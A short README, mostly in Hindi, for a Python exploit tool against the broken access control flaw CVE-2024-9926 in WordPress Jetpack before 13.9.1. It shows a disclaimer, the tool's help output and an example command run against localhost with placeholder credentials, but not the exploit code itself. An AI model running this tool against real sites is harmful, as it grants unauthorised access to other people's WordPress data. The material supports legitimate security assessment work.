
जेटपैक < 13.9.1 के टूटे हुए एक्सेस नियंत्रण (CVE-2024-9926) का शोषण करता है।
यह एक Python3 प्रोग्राम है जो Jetpack < 13.9.1 की टूटी हुई एक्सेस कंट्रोल भेद्यता (CVE-2024-9926) का शोषण करता है।
यह उपकरण सुरक्षा इंजीनियरों और appsec लोगों के लिए सुरक्षा मूल्यांकन हेतु है। कृपया इस उपकरण का जिम्मेदारी से उपयोग करें। मैं इस एप्लिकेशन के उपयोग के तरीके की कोई जिम्मेदारी नहीं लेता। मैं इस उपकरण के उपयोग से होने वाली किसी भी क्षति या किए गए किसी भी अपराध के लिए जिम्मेदार नहीं हूँ।
$ ./exploit.py --help
usage: exploit.py [-h] -t TARGET -u USERNAME -ap APPLICATION_PASSWORD [-v]
Exploit for Jetpack < 13.9.1 broken access control vulnerability. - v1.0 (2024-11-01)
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
URL of the target WordPress
-u USERNAME, --username USERNAME
Username of WordPress
-ap APPLICATION_PASSWORD, --application-password APPLICATION_PASSWORD
Application Password generated for the user (it's NOT the user password)
-v, --verbose verbose mode
./exploit.py -t https://localhost:1337 -u attacker -ap "AAAA 1111 bbbb 2222 CCCC 3333"
इस रिपॉजिटरी का उपयोग करके एक भेद्य अनुप्रयोग सेटअप किया जा सकता है।
विवरण के लिए LICENSE फ़ाइल देखें।